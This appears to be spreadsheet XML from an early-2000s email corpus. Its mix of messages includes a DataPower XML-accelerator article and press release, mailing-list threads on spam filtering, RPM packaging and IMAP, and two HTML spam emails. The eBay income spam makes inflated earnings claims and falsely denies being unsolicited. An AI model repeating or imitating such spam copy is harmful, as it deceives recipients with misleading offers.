  Copyright 2002, All Rights Reserved.
 Unsubscribe from 'Daily News'
  - Simply Reply to this Email with REMOVE within the Body or Subject
 &gt;  or
  - Go to: http://searchSecurity.techtarget.com/register
  - Log in to edit your profile.
  - Click on the link to Edit email subscriptions.
  - Uncheck the box next to the newsletter you wish 
    to unsubscribe from.
  - When finished, click "Save Changes to My Profile."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: DataPower announces XML-in-silicon
</t>
  </si>
  <si>
    <t xml:space="preserve">No analysis yet... don't know what to make of it yet. But here's the raw 
 bits for all to peruse and check out what's really going on... Best, 
 Rohit
 ===========================================================
 DataPower delivers XML acceleration device
 ByScott Tyler Shafer
 August 27, 2002 5:46 am PT
 DATAPOWER TECHNOLOGY ON Monday unveiled its network device designed 
 specifically to process XML data. Unlike competing solutions that 
 process XML data in software, DataPower's device processes the data in 
 hardware -- a technology achievement that provides greater performance, 
 according to company officials.
 The new device, dubbed DataPower XA35 XML Accelerator, is the first in a 
 family of products expected from the Cambridge, Mass.-based startup. The 
 DataPower family is based on a proprietary processing core technology 
 called XG3 that does the analysis, parsing, and processing of the XML 
 data.
 According to Steve Kelly, CEO of DataPower, the XA35 Accelerator was 
 conceived to meet the steady adoption of XML, the anticipated future 
 proliferation of Web services, and as a means to share data between two 
 businesses.
 "Our vision is to build out an XML-aware infrastructure," Kelly said. 
 "The XA35 is the first of a family."
 Kelly explained that converting data into XML increases the file size up 
 to 20 times. This, he said, makes processing the data very taxing on 
 application servers; DataPower believes an inline device is the best 
 alternative.
 In addition to the large file sizes, security is also of paramount 
 importance in the world of XML.
 "Today's firewalls are designed to inspect HTTP traffic only," Kelly 
 said. "A SOAP packet with XML will go straight through a firewall. 
 Firewalls are blind to XML today."
 Future products in DataPowers family will focus more specifically on 
 security, especially as Web services proliferate, Kelly said.
 According to DataPower, most existing solutions to offload XML 
 processing are homegrown and done in software -- an approach the company 
 itself tried initially and found to be inadequate with regards to speed 
 and security. After trying the software path, the company turned to 
 creating a solution that would process XML in hardware.
 "Our XG3 execution core converts XML to machine code," said Kelly, 
 adding that to his knowledge no other company's solution does. Kelly 
 said in the next few months he expects the market to be flooded with 
 technologies that claim to do XML processing -- claims that he believes 
 will be mostly false.
 Other content-aware switches, such as SSL (secure socket layer) 
 accelerators and load balancers, look at the first 64 bytes of a packet, 
 while the XA35 provides deeper packet inspection, looking at 1,400 bytes 
 and thus enabling greater processing of XML data, Kelly explained.
 The 1U-high network device has been tested against a large collection of 
 XML and XSL data types and can learn new flavors of the markup language 
 as they pass through the device.
 The XA35 can be deployed in proxy mode behind a firewall and a load 
 balancer, and it will inspect all traffic that passes and will identify 
 and process those packets that are XML, Kelly said.
 In addition to proxy mode, the device can also be used as an application 
 co-processor. This deployment method gives administrators more granular 
 control over what data is inspected and the application server itself 
 controls the device.
 DataPower is not the only company chasing this emerging market. Startup 
 Sarvega, based in Burr Ridge, Ill., introduced the Sarvega XPE switch in 
 May, and earlier this month Tarari, an Intel spin-off, launched with a 
 focus on content processing and acceleration.
 The DataPower device is now available, priced starting at $54,995. The 
 company has announced one customer to date and says the product is in 
 field trails at a number of other enterprises.
 =========================================================================
 DataPower has been addressing enterprise networking needs since it was 
 founded in early 1999 by Eugene Kuznetsov, a technology visionary who 
 foresaw the adverse effects XML and other next generation protocols 
 would have on enterprise networks. Long before industry interest in XML 
 grew, Kuznetsov assembled a team of world-class M.I.T. engineers and 
 designed the industry's first solutions to address the unique 
 requirements for processing XML. The first such solution was a software 
 interpreter called DGXT. This software-based approach to XML processing 
 is still licensed by many companies for use in their own products today.
 Leveraging the detailed knowledge and customer experience gained from 
 developing software-based accelerators, Kuznetsov's team raised the bar 
 and designed a system for processing XML in purpose-built hardware. In 
 2001, DataPower's effort produced XML Generation Three (XG3), the 
 industry's fastest technology for XML processing, bar none.
 Today, XG3 technology powers the industry's first wire-speed XML 
 network devices, enabling secure, high-speed applications and XML Web 
 Services. While other companies are just now marketing first versions of 
 products, DataPower is delivering its third generation of technology, 
 providing an immediate return on technology investments to 
 industry-leading customers and partners.
 DataPower's M.I.T. heritage is complemented by a management team that 
 brings decades of experience in the networking and computing industries, 
 drawing veteran leaders from several successful companies including 
 Akamai, Argon, Cascade, Castle Networks, Sycamore and Wellfleet.
 =========================================================================
 DataPower Technology Secures $9.5 Million in Funding
 Venrock Associates, Mobius Venture Capital and Seed Capital Back Pioneer 
 in XML-Aware Networking for Web Services
 CAMBRIDGE, Mass. - July 8, 2002 - DataPower Technology, Inc., the 
 leading provider of XML-Aware network infrastructure, today announced 
 that it has secured $9.5 million in series B financing. Investors for 
 this round include Venrock Associates, Mobius Venture Capital and Seed 
 Capital Partners. Michael Tyrrell, of Venrock, Bill Burnham, of Mobius, 
 and Jeff Fagnan, of Seed Capital, have joined DataPowers Board of 
 Directors.
 DataPower will use this funding to accelerate development, marketing and 
 sales of the companys breakthrough technology for XML-Aware networking. 
 Founded in 1999, DataPower invented the worlds first intelligent XML 
 networkingdevices, capable of transforming XML traffic and transactions 
 at the wire-speed enterprises need to effectively embrace Web services 
 and other XML-centric initiatives. DataPowers solutions are based on 
 its patent-pending XML Generation Three (XG3) technology.
 "Enterprises are adopting XML at rapid rate to facilitate inter-and 
 intra-company communications but their network infrastructure is ill 
 prepared to support the requirements of this new traffic type. 
 DataPowers XML-acceleration devices enable the wirespeed processing of 
 XML that is required to support next generation enterprise 
 applications," said Eugene Kuznetsov, CTO and founder of DataPower 
 Technology.
 "DataPower gives companies the ability to use XML thats critical to Web 
 services projects without sacrificing an ounce of performance." A single 
 DataPower acceleration engine delivers the processing power of 10 
 serversbreaking the performance bottleneck associated with XML 
 processing and delivering an extraordinary return on investment. In 
 addition, the DataPower platform provides enhanced XML security, 
 protection against XML-based denial-of-service attacks, connection of 
 e-business protocols for incompatible XML data streams, load balancing 
 between back-end servers and real-time statistics reports.
 "In the post-bubble economy, technology investment decisions require 
 laser-focused scrutiny. DataPowers patent-pending technology addresses 
 a very real and growing pain point for enterprises," said Michael 
 Tyrrell of Venrock Associates. "By turbo-charging their networks with 
 DataPowers unique XML-Aware networking technology, companies will be 
 free to adopt next generation Web services without encountering 
 performance and security pitfalls."
 "We looked long and hard for a company capable of addressing the rapidly 
 growing problems surrounding XML message processing performance and 
 security," said Bill Burnham of Mobius Venture Capital. "DataPower is on 
 their third generation of technology. Their patent pending XML 
 Generation Three (XG3)technology was quite simply the single most 
 compelling technology solution we have seen to date."
 "XML is not a nice-to-have, it is a must have for enterprises serious 
 about optimizing application efficiency. Since 1999, DataPower has been 
 developing solutions to facilitate enterprise use of XML and Web 
 services," said Jeff Fagnan of Seed Capital Partners. "DataPowers 
 XML-acceleration devices are a key requirement for enterprises that rely 
 on XML for mission critical applications."
 About Venrock Associates
 Venrock Associates was founded as the venture capital arm of the 
 Rockefeller Family and continues a tradition of funding entrepreneurs 
 that now spans over seven decades. Laurance S. Rockefeller pioneered 
 early stage venture financing in the 1930s. With over 300 investments 
 over a span of more than 70 years, the firm has an established a track 
 record of identifying and supporting promising early stage, technology- 
 based enterprises. As one of most experienced venture firms in the 
 United States, Venrock maintains a tradition of collaboration with 
 talented entrepreneurs to establish successful, enduring companies. 
 Venrock's continuing goal is to create long-term value by assisting 
 entrepreneurs in building companies from the formative stages. Their 
 consistent focus on Information Technology and Life Sciences-related 
 opportunities provides a reservoir of knowledge and a network of 
 contacts that have proven to be a catalyst for the growth of developing 
 organizations. Venrock's investments have included CheckPoint Software, 
 USinternetworking, Caliper Technologies, Illumina, Niku, DoubleClick, 
 Media Metrix, 3COM, Intel, and Apple Computer. With offices in New York 
 City, Cambridge, MA, and Menlo Park, CA, Venrock is well positioned to 
 respond to opportunities in any locale. For more information on Venrock 
 Associates, please visit www.venrock.com
 About Mobius Venture Capital
 Mobius Venture Capital, formerly SOFTBANK Venture Capital, is a $2.5 
 billion U.S.-based private equity venture capital firm managed by an 
 unparalleled team of former CEOs and entrepreneurs, technology pioneers, 
 senior executives from major technology corporations, and leaders from 
 the investment banking community. Mobius Venture Capital specializes 
 primarily in early-stage investments in the areas of: communications 
 systems software and services; infrastructure software and services; 
 professional services; enterprise applications; healthcare informatics; 
 consumer and small business applications; components; and emerging 
 technologies. Mobius Venture Capital combines its technology expertise 
 and broad financial assets with the industry's best entrepreneurs to 
 create a powerhouse portfolio of over 100 of the world's leading high 
 technology companies. Mobius Venture Capital can be contacted by 
 visiting their web site www.mobiusvc.com.
 About Seed Capital Partners
 Seed Capital Partners is an early-stage venture fund affiliated with 
 SoftBank Corporation, one of the world's leading Internet market forces. 
 Seed Capital manages funds focused primarily on companies addressing 
 Internet-enabled business-to-business digital information technology 
 opportunities, which are located in the Northeastern U.S., the 
 southeastern region of the Province of Ontario, Canada, and Israel. Seed 
 Capitals portfolio includes Spearhead Technologies, Concentric Visions 
 and CompanyDNA. For more information on Seed Capital Partners, please 
 visit www.seedcp.com.
 About DataPower Technology
 DataPower Technology provides enterprises with intelligent XML-Aware 
 network infrastructure to ensure unparalleled performance, security and 
 manageability of next-generation protocols. DataPowers patent-pending 
 XML Generation Three (XG3) technology powers the industrys first 
 wirespeed XML network devices, enabling secure, high-speed applications 
 and XML Web Services. Founded in 1999, DataPower is now delivering its 
 third generation of technology, providing immediate return on technology 
 investments to industry-leading customers and partners. DataPower is 
 privately held and based in Cambridge, MA. Investors include Mobius 
 Venture Capital, Seed Capital Partners, and Venrock Associates.
 CONTACT:
 DataPower Technology, Inc.
 Kieran Taylor
 617-864-0455
 kieran@datapower.com
 Schwartz Communications
 John Moran/Heather Chichakly
 781-684-0770
 datapower@schwartz-pr.com
 ========================================================================
 Steve Kelly, chairman and CEO
 During over twenty years in the technology industry, Steve Kelly has 
 built and managed global enterprise networks, provided consulting 
 services to Fortune 50 businesses, and been involved in the launch of 
 several start-ups. Prior to DataPower, Kelly was an 
 entrepreneur-in-residence at Venrock Associates, and was co-founder of 
 Castle Networks, where he led the company's sales, service and marketing 
 functions. Castle was acquired by Siemens AG in 1999 to create Unisphere 
 Networks, which was subsequently purchased by Juniper Networks. Kelly 
 was an early contributor at Cascade Communications, where he built and 
 managed the company's core switching business; Cascade's annual revenues 
 grew from $2 million to $300 million annually during Kelly's tenure. 
 Kelly also worked at Digital Equipment Corporation where he managed and 
 grew their corporate network to 50,000+ nodes in 28 countries, the 
 largest in the world at the time. Kelly has a B.S. in Information 
 Systems from Bentley College.
 Eugene Kuznetsov, founder, president and CTO
 Eugene Kuznetsov is a technology visionary that has been working to 
 address enterprise XML issues since the late 90s. Kuznetsov founded 
 DataPower Technology, Inc. in 1999 to provide enterprises with an 
 intelligent, XML-aware network infrastructure to support next-generation 
 applications. Prior to starting DataPower, Kuznetsov led the Java JIT 
 Compiler effort for Microsoft Internet Explorer for Macintosh 4.0. He 
 was also part of the team which developed one of the first clean room 
 Java VM's. This high-speed runtime technology was licensed by some of 
 the industry's largest technology companies, including Apple Computer. 
 He has consulted to numerous companies and worked on a variety of 
 hardware and software engineering problems in the areas of memory 
 management, power electronics, optimized execution engines and 
 application integration. Kuznetsov holds a B.S. in electrical 
 engineering from MIT.
 Steve Willis, vice president of advanced technology
 Steve Willis is an accomplished entrepreneur and a pioneer in protocol 
 optimization. Prior to joining DataPower, Willis was co-founder and CTO 
 of Argon Networks, a provider of high-performance switching routers that 
 was acquired by Siemens AG in 1999 to create Unisphere Networks; 
 Unisphere was subsequently purchased by Juniper Networks. Before Argon, 
 Steve was vice president of advanced technology at Bay Networks (now 
 Nortel Networks) where he led both IP and ATM-related technology 
 development and managed a group that generated 24 patent applications, 
 developed a 1 Mbps forwarding engine and led the specification of the 
 ATM Forum's PNNI routing protocol. Most notably, Steve was co-founder, 
 original software director and architect for Wellfleet Communications, a 
 leading pioneer of multi-protocol routers. Wellfleet was rated as the 
 fastest growing company in the U.S. for two consecutive years by Fortune 
 magazine. Willis is currently a member of the Institute of Electrical 
 and Electronics Engineers (IEEE) and the Internet Research Task Force 
 (IRTF) Routing Research Group. Willis has a B.D.I.C. in Computer Science 
 from the University of Massachusetts.
 Bill Tao, vice president of engineering
 With a vast understanding of network optimization technologies and 
 extensive experience in LAN and WAN networking, Bill Tao brings over 25 
 years of critical knowledge to lead DataPower's engineering efforts. 
 Prior to DataPower, Tao was the vice president of engineering for 
 Sycamore Networks, developing a family of metro/regional optical network 
 switches. He is also well acquainted with network optimization 
 techniques as he was previously vice president of engineering at 
 InfoLibria, where he led development and software quality assurance 
 engineering for a family of network caching products. Tao has held 
 senior engineering positions at NetEdge, Proteon, Codex and Wang. Tao 
 received a B.S. in Electrical Engineering from the University of 
 Connecticut and an M.S. in Computer Science from the University of 
 Illinois.
 Kieran Taylor, director of product marketing
 Kieran Taylor has an accomplished record as a marketing professional, 
 industry analyst and journalist. Prior to joining DataPower, Taylor was 
 the director of product management and marketing for Akamai Technologies 
 (NASDAQ: AKAM). As an early contributor at Akamai, he helped develop the 
 company's initial positioning and led the technical development and 
 go-to-market activities for Akamai's flagship EdgeSuite service. 
 Taylor's early contribution helped position the service provider to 
 secure a $12.6 billion IPO. He has also held senior marketing management 
 positions at Nortel Networks, Inc. and Bay Networks. Taylor was 
 previously an analyst at TeleChoice, Inc. and the Wide Area Networks 
 editor for Data Communications, a McGraw Hill publication. Taylor holds 
 a B.A. in Print Journalism from the Pennsylvania State University School 
 of Communications.
 =================================================================
 Board of Advisors
 Mark Hoover
 Mark Hoover is President and co-founder of Acuitive, Inc., a start-up 
 accelerator. With over 20 years experience in the networking industry, 
 Hoover's expertise spans product development, marketing, and business 
 development. Before launching Acuitive, Hoover worked at AT&amp;T Bell 
 Laboratories, AT&amp;T Computer Systems, SynOptics, and Bay Networks, where 
 he played a role in the development of key technologies, such as 
 10-BASET, routing, FDDI, ATM, Ethernet switching, firewall, Internet 
 traffic management, and edge WAN switch industries.
 George Kassabgi
 Currently Vice President of Engineering at BEA Systems, Mr. Kassabgi has 
 held executive-level positions in engineering, sales and marketing, and 
 has spearheaded leading-edge developments in the application server 
 marketplace since 1996. He is widely known for his regular speaking 
 engagements at JavaOne, as well as columns and contributions in JavaPro, 
 Java Developer's Journal and other publications. In addition to being a 
 venerated Java expert, George Kassabgi holds a patent on SmartObject 
 Technology, and authored the technical book Progress V8.
 Marshall T. Rose
 Marshall T. Rose runs his own firm, Dover Beach Consulting, Inc. He 
 formerly held the position of the Internet Engineering Task Force (IETF) 
 Area Director for Network Management, one of a dozen individuals who 
 oversaw the Internet's standardization process. Rose is the author of 
 several professional texts on subjects such as Internet Management, 
 Electronic Mail, and Directory Services, which have been published in 
 four languages. He is well known for his implementations of core 
 Internet technologies (such as POP, SMTP, and SNMP) and OSI technologies 
 (such as X.500 and FTAM). Rose received a PhD in Information and 
 Computer Science from the University of California, Irvine, in 1984.
</t>
  </si>
  <si>
    <t xml:space="preserve">[Guido]
 &gt;   ...
 &gt;   I don't know how big that pickle would be, maybe loading it each time
 &gt;   is fine.  Or maybe marshalling.)
 My tests train on about 7,000 msgs, and a binary pickle of the database is
 approaching 10 million bytes.  I haven't done anything to try to reduce its
 size, and know of some specific problem areas (for example, doing character
 5-grams of "long words" containing high-bit characters generates a lot of
 database entries, and I suspect they're approximately worthless).  OTOH,
 adding in more headers will increase the size.  So let's call it 10 meg
 &lt;wink&gt;.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Problem with my spec file
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Victor wrote :
 &gt; Can someone tell me what I am doing wrong? it's like make doesn't take
 &gt; the PREFIX override... It's crazy. I don't get it...
 &gt; OS: TurboLinux6 rmp3.0.6 make 3.79.1
 &gt; 
 &gt; I just don't get this. It should work...
 &gt; 
 [...]
 &gt; 
 &gt; %build
 &gt;    %{__perl} Makefile.PL LOCAL_RULES_DIR=/etc/spamassassin
 &gt; INSTALLDIRS=vendor PREFIX=%{_prefix}
 &gt;    make OPTIMIZE="$RPM_OPT_FLAGS" PREFIX=%{_prefix}
 &gt; %install
 &gt;    rm -rf $RPM_BUILD_ROOT
 &gt;    %makeinstall PREFIX=%{buildroot}%{_prefix} \
 &gt;                 INSTALLMAN1DIR=%{buildroot}%{_mandir}/man1 \
 &gt;                 INSTALLMAN3DIR=%{buildroot}%{_mandir}/man3 \
 &gt;                 LOCAL_RULES_DIR=%{buildroot}%{_sysconfdir}/spamassassin
 [...]
 Well, first you need to look at the Makefile.PL to see if it uses the
 PREFIX you're trying to pass to it or not. Maybe you'll need to "override"
 other paths when doing the "make".
 Second, the "%makeinstall" macro automatically overrides many common values
 like "prefix=" or "datadir=", so it's completely redundant with the
 "PREFIX=" you're passing to it. Take a look at the "Makefile" you have at
 that point to see how the "install" target is, and what it uses.
 Last, as Chris suggested, you can take a look at an existing package, like
 the one in Rawhide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</si>
  <si>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Make $500 - $2500/Week on Ebay                     3352
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;BODY&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF"&gt;
 &lt;table width=3D"62%" height=3D"218"&gt;
   &lt;tr valign=3D"top"&gt; 
     &lt;td height=3D"260"&gt; 
       &lt;p&gt;&lt;font size=3D"3"&gt;&lt;b&gt;Fortunes are literally being made in this gre=
 at new 
         marketplace!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;O&lt;font size=3D"3"&gt;&lt;/font&gt;&lt;font size=3D"3"&gt;ver &lt;b&gt;$9 Billion&lt;/b&gt; i=
 n merchandise 
         was sold on &lt;b&gt;eBay&lt;/b&gt; in 2001 by people just like you - &lt;u&gt;right=
  from 
         their homes&lt;/u&gt;! &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size=3D"3"&gt;Now you too can learn the secrets of &lt;b&gt;successf=
 ul selling 
         &lt;/b&gt;on&lt;b&gt; eBay&lt;/b&gt; and &lt;b&gt;make a staggering income&lt;/b&gt; from the co=
 mfort 
         of &lt;b&gt;your own home&lt;/b&gt;. If you are &lt;b&gt;motivated&lt;/b&gt;, capable of h=
 aving 
         an&lt;b&gt; open mind&lt;/b&gt;, and can follow simple directions, then &lt;a hre=
 f=3D"http://www.generaledu.com/ebayepubs"&gt;visit 
         us here.&lt;/a&gt; If server busy - &lt;a href=3D"http://168.75.161.164/eba=
 yepubs/"&gt;alternate.&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size=3D"2"&gt; &lt;font size=3D"1"&gt;We are strongly against sendin=
 g unsolicited 
         emails to those who do not wish to receive our special mailings. Y=
 ou have 
         opted in to one or more of our affiliate sites requesting to be no=
 tified 
         of any special offers we may run from time to time. We also have a=
 ttained 
         the services of an independent 3rd party to overlook list manageme=
 nt and 
         removal services. This is NOT unsolicited email. If you do not wis=
 h to 
         receive further mailings, please &lt;a href=3D"http://www.generaledu.=
 com/remove.html"&gt;GO 
         HERE&lt;/a&gt; to be removed from the list. Please accept our apologies =
 if you 
         have been sent this email in error. &lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp; &lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp; &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;html&gt;&lt;p&gt;&lt;head&gt;&lt;p&gt;&lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 &lt;p&gt;charset=3Diso-8859-1"&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Trust me on funding, says Brown
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381139,215/
 Date: 2002-09-30T03:05:04+01:00
 No retreat on PFI, unions are warned.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Imap servers that support the MH folder/file standards
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;From time to time I have to travel, and seem to end up with a rather slow
 link back home that makes remote display of exmh rather slow, even over
 ssh and/or VNC. What I'd  like to do is use an imap capable mailer to
 communicate with an imap server that is serving up my MH folders. Does
 anyone know of any Imap servers that can do this? I'd like it to be able
 to handle the  mailstore using MH commands so things don't get out of
 sync. At the moment I use a combo of fetchmail and procmail to handle
 soring things when I'm local, and it's possible that an imap server
 would mung this when I deleted a message remotely.
 	Stephen
 -- 
   The views expressed above are not those of PGS Tensor.
     "We've heard that a million monkeys at a million keyboards could produce
      the Complete Works of Shakespeare; now, thanks to the Internet, we know
      this is not true."            Robert Wilensky, University of California
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Un mois de maintenance informatique OFFERT
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- 
 IPOGEA : 
 Si vous ne pouvez lire le format HTML vous pouvez visualiser ce message  l'adresse :
 &lt;http://www.ipogea.com/news.php3?prov=SLAG2705&gt;
 Si vous ne souhaitez plus recevoir ce message, il vous suffit d'y repondre avec le sujet REMOVE
 --&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;News IPOGEA&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=#FFFFFF&gt;
 &lt;TABLE WIDTH=567 BORDER=0 CELLPADDING=0 CELLSPACING=0 align="center"&gt;
   &lt;TR&gt; 
     &lt;TD&gt; &lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=12 HEIGHT=1&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=189 HEIGHT=1&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=355 HEIGHT=1&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=10 HEIGHT=1&gt;&lt;/TD&gt;
 	&lt;TD&gt; &lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=1 HEIGHT=1&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt; 
     &lt;TD COLSPAN=5 height="22"&gt; 
       &lt;div align="center"&gt;&lt;font face=Arial size=2&gt;&lt;font face=Arial color=#000000 size=2 font&gt;&lt;b&gt;Si 
         vous ne souhaitez plus recevoir ce courrier, &lt;a href="mailto:desabonnement@ipogea.com?subject=REMOVE"&gt;cliquez 
         ici&lt;/a&gt;&lt;/b&gt;&lt;/font&gt; &lt;br&gt;
         &amp;nbsp; &lt;/font&gt; &lt;/div&gt;
     &lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt; 
     &lt;TD COLSPAN=2 ROWSPAN=2&gt; &lt;IMG SRC="http://www.ipogea.com/images/news2/ipo_02.jpg" WIDTH=201 HEIGHT=128&gt;&lt;/TD&gt;
     &lt;TD COLSPAN=3&gt; &lt;IMG SRC="http://www.ipogea.com/images/news2/ipo_03.jpg" WIDTH=366 HEIGHT=121&gt;&lt;/TD&gt;
  	&lt;TD &gt;&lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=1 HEIGHT=121&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt; 
     &lt;TD COLSPAN=3 height="5"&gt; 
       &lt;div align="right"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#293896"&gt;01 
         44 54 32 82&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
     &lt;/TD&gt;
  	&lt;TD &gt;&lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=1 HEIGHT=7&gt;&lt;/TD&gt;
 &lt;/TR&gt;
   &lt;TR&gt; 
     &lt;TD COLSPAN=5 height="31"&gt; 
       &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;b&gt;&lt;font color="CF3702"&gt;UN 
         MOIS DE MAINTENANCE OFFERT&lt;/font&gt;&lt;/b&gt;&lt;font color="CF3702"&gt;*&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
     &lt;/TD&gt;
   	&lt;TD height="31" &gt;&lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=1 HEIGHT=7&gt;&lt;/TD&gt;
 &lt;/TR&gt;
   &lt;TR&gt; 
     &lt;TD COLSPAN=5&gt;&lt;img src="http://www.ipogea.com/images/news2/ipo_06.jpg" width=567 height=11&gt;&lt;/TD&gt;
  	&lt;TD &gt;&lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=1 HEIGHT=11&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt; 
     &lt;TD rowspan="3" &gt; &lt;IMG SRC="http://www.ipogea.com/images/news2/ipo_07.jpg" WIDTH=12 HEIGHT=109&gt;&lt;/TD&gt;
     &lt;TD COLSPAN=2 &gt;&lt;b&gt;&lt;font color="#31266a" face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;OUBLIEZ 
       VOS PROBLEMES INFORMATIQUES DU QUOTIDIEN&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
     &lt;/TD&gt;
     &lt;TD COLSPAN=2 rowspan="3"&gt; &lt;IMG SRC="http://www.ipogea.com/images/news2/ipo_09.jpg" WIDTH=11 HEIGHT=109&gt;&lt;/TD&gt;
  	&lt;TD rowspan="3"&gt;&lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=1 HEIGHT=109&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt; 
     &lt;TD COLSPAN=2 &gt; 
       &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#31266a"&gt; 
         &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Ordinateurs bloqu&amp;eacute;s, 
         Virus informatique, Perte de donn&amp;eacute;es, Connexion Internet &lt;br&gt;
         &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;d&amp;eacute;fectueuse, Imprimante 
         d&amp;eacute;configur&amp;eacute;e, Serveur en panne &amp;#133; &lt;b&gt;Votre entreprise 
         ne peut &lt;/b&gt;&lt;br&gt;
         &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;b&gt;plus rester bloqu&amp;eacute;e 
         pendant plusieurs heures voire plusieurs jours.&lt;/b&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/p&gt;
     &lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt; 
     &lt;TD COLSPAN=2 &gt;&lt;font color="#31266a" face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;br&gt;
       PROFITEZ D'UN INFORMATICIEN A TEMPS PARTAGE&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt; 
     &lt;TD COLSPAN=5 background="http://www.ipogea.com/images/news2/ipo_10.jpg" HEIGHT=253&gt; 
       &lt;table width=550 border="0"&gt;
         &lt;tr&gt; 
           &lt;td valign="top" height="17" colspan="5" &gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" 
 color="#31266a"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Votre 
             spcialiste informatique IPOGEA vous rend visite plusieurs fois par 
             mois &lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;et assure une &lt;b&gt;maintenance 
             adapte&lt;/b&gt; de votre systme informatique. Vous bnficiez &lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;de&lt;b&gt; l'assistance tlphonique 
             IPOGEA&lt;/b&gt; pour vous aider dans votre gestion quotidienne. &lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;En cas d'urgence, les techniciens 
             IPOGEA interviennent dans les &lt;b&gt;meilleurs dlais sur site.&lt;br&gt;
             &lt;br&gt;
             &lt;br&gt;
             &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td valign="top" rowspan="2"&gt;&amp;nbsp;&lt;/td&gt;
           &lt;td valign="top" height="2" colspan="2"&gt; 
             &lt;p&gt;&lt;font color="CF3702" face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;FAITES 
               DES ECONOMIES :&lt;/b&gt;&lt;/font&gt; &lt;br&gt;
               &lt;font size="1" face="Verdana, Arial, Helvetica, sans-serif" color="E87429"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;Gr&amp;acirc;ce 
